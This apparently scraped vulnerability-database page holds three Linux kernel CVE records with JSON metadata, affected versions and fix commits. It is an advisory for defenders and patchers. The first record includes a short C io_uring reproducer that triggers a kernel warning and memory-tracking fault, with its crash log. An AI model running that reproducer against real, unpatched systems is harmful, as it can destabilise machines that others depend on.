Version: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 Version: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 Version: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 Version: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 Version: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 Version: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 Version: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 Version: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35877",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-01-16T21:13:41.454834Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-01-16T21:14:37.162Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.797Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f18681daaec9665a15c5e7e0f591aad5d0ac622b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/09e6bb53217bf388a0d2fd7fb21e74ab9dffc173"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c2b2430b48f3c9eaccd2c3d2ad75bb540d4952f4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7cfee26d1950250b14c5cb0a37b142f3fcc6396a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/97e93367e82752e475a33839a80b33bdbef1209f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/51b7841f3fe84606ec0bd8da859d22e05e5419ec"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1341e4b32e1fb1b0acd002ccd56f07bd32f2abc6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/04c35ab3bdae7fefbd7c7a7355f29fa03a035221"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/x86/mm/pat/memtype.c",
"mm/memory.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f18681daaec9665a15c5e7e0f591aad5d0ac622b",
"status": "affected",
"version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
"versionType": "git"
},
{
"lessThan": "09e6bb53217bf388a0d2fd7fb21e74ab9dffc173",
"status": "affected",
"version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
"versionType": "git"
},
{
"lessThan": "c2b2430b48f3c9eaccd2c3d2ad75bb540d4952f4",
"status": "affected",
"version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
"versionType": "git"
},
{
"lessThan": "7cfee26d1950250b14c5cb0a37b142f3fcc6396a",
"status": "affected",
"version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
"versionType": "git"
},
{
"lessThan": "97e93367e82752e475a33839a80b33bdbef1209f",
"status": "affected",
"version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
"versionType": "git"
},
{
"lessThan": "51b7841f3fe84606ec0bd8da859d22e05e5419ec",
"status": "affected",
"version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
"versionType": "git"
},
{
"lessThan": "1341e4b32e1fb1b0acd002ccd56f07bd32f2abc6",
"status": "affected",
"version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
"versionType": "git"
},
{
"lessThan": "04c35ab3bdae7fefbd7c7a7355f29fa03a035221",
"status": "affected",
"version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/x86/mm/pat/memtype.c",
"mm/memory.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.29"
},
{
"lessThan": "2.6.29",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.155",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.85",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "2.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "2.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "2.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.155",
"versionStartIncluding": "2.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.85",
"versionStartIncluding": "2.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.26",
"versionStartIncluding": "2.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.5",
"versionStartIncluding": "2.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.29",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/mm/pat: fix VM_PAT handling in COW mappings\n\nPAT handling won\u0027t do the right thing in COW mappings: the first PTE (or,\nin fact, all PTEs) can be replaced during write faults to point at anon\nfolios. Reliably recovering the correct PFN and cachemode using\nfollow_phys() from PTEs will not work in COW mappings.\n\nUsing follow_phys(), we might just get the address+protection of the anon\nfolio (which is very wrong), or fail on swap/nonswap entries, failing\nfollow_phys() and triggering a WARN_ON_ONCE() in untrack_pfn() and\ntrack_pfn_copy(), not properly calling free_pfn_range().\n\nIn free_pfn_range(), we either wouldn\u0027t call memtype_free() or would call\nit with the wrong range, possibly leaking memory.\n\nTo fix that, let\u0027s update follow_phys() to refuse returning anon folios,\nand fallback to using the stored PFN inside vma-\u003evm_pgoff for COW mappings\nif we run into that.\n\nWe will now properly handle untrack_pfn() with COW mappings, where we\ndon\u0027t need the cachemode. We\u0027ll have to fail fork()-\u003etrack_pfn_copy() if\nthe first page was replaced by an anon folio, though: we\u0027d have to store\nthe cachemode in the VMA to make this work, likely growing the VMA size.\n\nFor now, lets keep it simple and let track_pfn_copy() just fail in that\ncase: it would have failed in the past with swap/nonswap entries already,\nand it would have done the wrong thing with anon folios.\n\nSimple reproducer to trigger the WARN_ON_ONCE() in untrack_pfn():\n\n\u003c--- C reproducer ---\u003e\n #include \u003cstdio.h\u003e\n #include \u003csys/mman.h\u003e\n #include \u003cunistd.h\u003e\n #include \u003cliburing.h\u003e\n\n int main(void)\n {\n struct io_uring_params p = {};\n int ring_fd;\n size_t size;\n char *map;\n\n ring_fd = io_uring_setup(1, \u0026p);\n if (ring_fd \u003c 0) {\n perror(\"io_uring_setup\");\n return 1;\n }\n size = p.sq_off.array + p.sq_entries * sizeof(unsigned);\n\n /* Map the submission queue ring MAP_PRIVATE */\n map = mmap(0, size, PROT_READ | PROT_WRITE, MAP_PRIVATE,\n ring_fd, IORING_OFF_SQ_RING);\n if (map == MAP_FAILED) {\n perror(\"mmap\");\n return 1;\n }\n\n /* We have at least one page. Let\u0027s COW it. */\n *map = 0;\n pause();\n return 0;\n }\n\u003c--- C reproducer ---\u003e\n\nOn a system with 16 GiB RAM and swap configured:\n # ./iouring \u0026\n # memhog 16G\n # killall iouring\n[ 301.552930] ------------[ cut here ]------------\n[ 301.553285] WARNING: CPU: 7 PID: 1402 at arch/x86/mm/pat/memtype.c:1060 untrack_pfn+0xf4/0x100\n[ 301.553989] Modules linked in: binfmt_misc nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_g\n[ 301.558232] CPU: 7 PID: 1402 Comm: iouring Not tainted 6.7.5-100.fc38.x86_64 #1\n[ 301.558772] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebu4\n[ 301.559569] RIP: 0010:untrack_pfn+0xf4/0x100\n[ 301.559893] Code: 75 c4 eb cf 48 8b 43 10 8b a8 e8 00 00 00 3b 6b 28 74 b8 48 8b 7b 30 e8 ea 1a f7 000\n[ 301.561189] RSP: 0018:ffffba2c0377fab8 EFLAGS: 00010282\n[ 301.561590] RAX: 00000000ffffffea RBX: ffff9208c8ce9cc0 RCX: 000000010455e047\n[ 301.562105] RDX: 07fffffff0eb1e0a RSI: 0000000000000000 RDI: ffff9208c391d200\n[ 301.562628] RBP: 0000000000000000 R08: ffffba2c0377fab8 R09: 0000000000000000\n[ 301.563145] R10: ffff9208d2292d50 R11: 0000000000000002 R12: 00007fea890e0000\n[ 301.563669] R13: 0000000000000000 R14: ffffba2c0377fc08 R15: 0000000000000000\n[ 301.564186] FS: 0000000000000000(0000) GS:ffff920c2fbc0000(0000) knlGS:0000000000000000\n[ 301.564773] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 301.565197] CR2: 00007fea88ee8a20 CR3: 00000001033a8000 CR4: 0000000000750ef0\n[ 301.565725] PKRU: 55555554\n[ 301.565944] Call Trace:\n[ 301.566148] \u003cTASK\u003e\n[ 301.566325] ? untrack_pfn+0xf4/0x100\n[ 301.566618] ? __warn+0x81/0x130\n[ 301.566876] ? untrack_pfn+0xf4/0x100\n[ 3\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:07:25.990Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f18681daaec9665a15c5e7e0f591aad5d0ac622b"
},
{
"url": "https://git.kernel.org/stable/c/09e6bb53217bf388a0d2fd7fb21e74ab9dffc173"
},
{
"url": "https://git.kernel.org/stable/c/c2b2430b48f3c9eaccd2c3d2ad75bb540d4952f4"
},
{
"url": "https://git.kernel.org/stable/c/7cfee26d1950250b14c5cb0a37b142f3fcc6396a"
},
{
"url": "https://git.kernel.org/stable/c/97e93367e82752e475a33839a80b33bdbef1209f"
},
{
"url": "https://git.kernel.org/stable/c/51b7841f3fe84606ec0bd8da859d22e05e5419ec"
},
{
"url": "https://git.kernel.org/stable/c/1341e4b32e1fb1b0acd002ccd56f07bd32f2abc6"
},
{
"url": "https://git.kernel.org/stable/c/04c35ab3bdae7fefbd7c7a7355f29fa03a035221"
}
],
"title": "x86/mm/pat: fix VM_PAT handling in COW mappings",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35877",
"datePublished": "2024-05-19T08:34:34.604Z",
"dateReserved": "2024-05-17T13:50:33.110Z",
"dateUpdated": "2025-05-04T09:07:25.990Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36960 (GCVE-0-2024-36960)
Vulnerability from cvelistv5
Published
2024-06-03 07:49
Modified
2025-05-04 09:12
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/vmwgfx: Fix invalid reads in fence signaled events
Correctly set the length of the drm_event to the size of the structure
that's actually used.
The length of the drm_event was set to the parent structure instead of
to the drm_vmw_event_fence which is supposed to be read. drm_read
uses the length parameter to copy the event to the user space thus
resuling in oob reads.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 8b7de6aa84682a3396544fd88cd457f95484573a Version: 8b7de6aa84682a3396544fd88cd457f95484573a Version: 8b7de6aa84682a3396544fd88cd457f95484573a Version: 8b7de6aa84682a3396544fd88cd457f95484573a Version: 8b7de6aa84682a3396544fd88cd457f95484573a Version: 8b7de6aa84682a3396544fd88cd457f95484573a Version: 8b7de6aa84682a3396544fd88cd457f95484573a Version: 8b7de6aa84682a3396544fd88cd457f95484573a |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36960",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-03T13:45:10.318634Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125 Out-of-bounds Read",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:47:40.946Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:43:50.585Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2f527e3efd37c7c5e85e8aa86308856b619fa59f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cef0962f2d3e5fd0660c8efb72321083a1b531a9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3cd682357c6167f636aec8ac0efaa8ba61144d36"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b7bab33c4623c66e3398d5253870d4e88c52dfc0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0dbfc73670b357456196130551e586345ca48e1b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7b5fd3af4a250dd0a2a558e07b43478748eb5d22"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/deab66596dfad14f1c54eeefdb72428340d72a77"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a37ef7613c00f2d72c8fc08bd83fb6cc76926c8c"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/vmwgfx/vmwgfx_fence.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "2f527e3efd37c7c5e85e8aa86308856b619fa59f",
"status": "affected",
"version": "8b7de6aa84682a3396544fd88cd457f95484573a",
"versionType": "git"
},
{
"lessThan": "cef0962f2d3e5fd0660c8efb72321083a1b531a9",
"status": "affected",
"version": "8b7de6aa84682a3396544fd88cd457f95484573a",
"versionType": "git"
},
{
"lessThan": "3cd682357c6167f636aec8ac0efaa8ba61144d36",
"status": "affected",
"version": "8b7de6aa84682a3396544fd88cd457f95484573a",
"versionType": "git"
},
{
"lessThan": "b7bab33c4623c66e3398d5253870d4e88c52dfc0",
"status": "affected",
"version": "8b7de6aa84682a3396544fd88cd457f95484573a",
"versionType": "git"
},
{
"lessThan": "0dbfc73670b357456196130551e586345ca48e1b",
"status": "affected",
"version": "8b7de6aa84682a3396544fd88cd457f95484573a",
"versionType": "git"
},
{
"lessThan": "7b5fd3af4a250dd0a2a558e07b43478748eb5d22",
"status": "affected",
"version": "8b7de6aa84682a3396544fd88cd457f95484573a",
"versionType": "git"
},
{
"lessThan": "deab66596dfad14f1c54eeefdb72428340d72a77",
"status": "affected",
"version": "8b7de6aa84682a3396544fd88cd457f95484573a",
"versionType": "git"
},
{
"lessThan": "a37ef7613c00f2d72c8fc08bd83fb6cc76926c8c",
"status": "affected",
"version": "8b7de6aa84682a3396544fd88cd457f95484573a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/vmwgfx/vmwgfx_fence.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.4"
},
{
"lessThan": "3.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/vmwgfx: Fix invalid reads in fence signaled events\n\nCorrectly set the length of the drm_event to the size of the structure\nthat\u0027s actually used.\n\nThe length of the drm_event was set to the parent structure instead of\nto the drm_vmw_event_fence which is supposed to be read. drm_read\nuses the length parameter to copy the event to the user space thus\nresuling in oob reads."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:12:52.237Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2f527e3efd37c7c5e85e8aa86308856b619fa59f"
},
{
"url": "https://git.kernel.org/stable/c/cef0962f2d3e5fd0660c8efb72321083a1b531a9"
},
{
"url": "https://git.kernel.org/stable/c/3cd682357c6167f636aec8ac0efaa8ba61144d36"
},
{
"url": "https://git.kernel.org/stable/c/b7bab33c4623c66e3398d5253870d4e88c52dfc0"
},
{
"url": "https://git.kernel.org/stable/c/0dbfc73670b357456196130551e586345ca48e1b"
},
{
"url": "https://git.kernel.org/stable/c/7b5fd3af4a250dd0a2a558e07b43478748eb5d22"
},
{
"url": "https://git.kernel.org/stable/c/deab66596dfad14f1c54eeefdb72428340d72a77"
},
{
"url": "https://git.kernel.org/stable/c/a37ef7613c00f2d72c8fc08bd83fb6cc76926c8c"
}
],
"title": "drm/vmwgfx: Fix invalid reads in fence signaled events",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36960",
"datePublished": "2024-06-03T07:49:58.951Z",
"dateReserved": "2024-05-30T15:25:07.081Z",
"dateUpdated": "2025-05-04T09:12:52.237Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52599 (GCVE-0-2023-52599)
Vulnerability from cvelistv5
Published
2024-03-06 06:45
Modified
2025-05-04 07:39
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
jfs: fix array-index-out-of-bounds in diNewExt
[Syz report]
UBSAN: array-index-out-of-bounds in fs/jfs/jfs_imap.c:2360:2
index -878706688 is out of range for type 'struct iagctl[128]'
CPU: 1 PID: 5065 Comm: syz-executor282 Not tainted 6.7.0-rc4-syzkaller-00009-gbee0e7762ad2 #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/10/2023
Call Trace:
<TASK>
__dump_stack lib/dump_stack.c:88 [inline]
dump_stack_lvl+0x1e7/0x2d0 lib/dump_stack.c:106
ubsan_epilogue lib/ubsan.c:217 [inline]
__ubsan_handle_out_of_bounds+0x11c/0x150 lib/ubsan.c:348
diNewExt+0x3cf3/0x4000 fs/jfs/jfs_imap.c:2360
diAllocExt fs/jfs/jfs_imap.c:1949 [inline]
diAllocAG+0xbe8/0x1e50 fs/jfs/jfs_imap.c:1666
diAlloc+0x1d3/0x1760 fs/jfs/jfs_imap.c:1587
ialloc+0x8f/0x900 fs/jfs/jfs_inode.c:56
jfs_mkdir+0x1c5/0xb90 fs/jfs/namei.c:225
vfs_mkdir+0x2f1/0x4b0 fs/namei.c:4106
do_mkdirat+0x264/0x3a0 fs/namei.c:4129
__do_sys_mkdir fs/namei.c:4149 [inline]
__se_sys_mkdir fs/namei.c:4147 [inline]
__x64_sys_mkdir+0x6e/0x80 fs/namei.c:4147
do_syscall_x64 arch/x86/entry/common.c:51 [inline]
do_syscall_64+0x45/0x110 arch/x86/entry/common.c:82
entry_SYSCALL_64_after_hwframe+0x63/0x6b
RIP: 0033:0x7fcb7e6a0b57
Code: ff ff 77 07 31 c0 c3 0f 1f 40 00 48 c7 c2 b8 ff ff ff f7 d8 64 89 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 b8 53 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffd83023038 EFLAGS: 00000286 ORIG_RAX: 0000000000000053
RAX: ffffffffffffffda RBX: 00000000ffffffff RCX: 00007fcb7e6a0b57
RDX: 00000000000a1020 RSI: 00000000000001ff RDI: 0000000020000140
RBP: 0000000020000140 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000286 R12: 00007ffd830230d0
R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
[Analysis]
When the agstart is too large, it can cause agno overflow.
[Fix]
After obtaining agno, if the value is invalid, exit the subsequent process.
Modified the test from agno > MAXAG to agno >= MAXAG based on linux-next
report by kernel test robot (Dan Carpenter).
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52599",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-26T17:46:56.259920Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-26T17:47:03.242Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.336Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f423528488e4f9606cef858eceea210bf1163f41"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/de6a91aed1e0b1a23e9c11e7d7557f088eeeb017"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e2b77d107b33bb31c8b1f5c4cb8f277b23728f1e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6aa30020879042d46df9f747e4f0a486eea6fe98"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3537f92cd22c672db97fae6997481e678ad14641"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6996d43b14486f4a6655b10edc541ada1b580b4b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5a6660139195f5e2fbbda459eeecb8788f3885fe"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/49f9637aafa6e63ba686c13cb8549bf5e6920402"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/jfs/jfs_imap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f423528488e4f9606cef858eceea210bf1163f41",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "de6a91aed1e0b1a23e9c11e7d7557f088eeeb017",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e2b77d107b33bb31c8b1f5c4cb8f277b23728f1e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6aa30020879042d46df9f747e4f0a486eea6fe98",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "3537f92cd22c672db97fae6997481e678ad14641",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6996d43b14486f4a6655b10edc541ada1b580b4b",
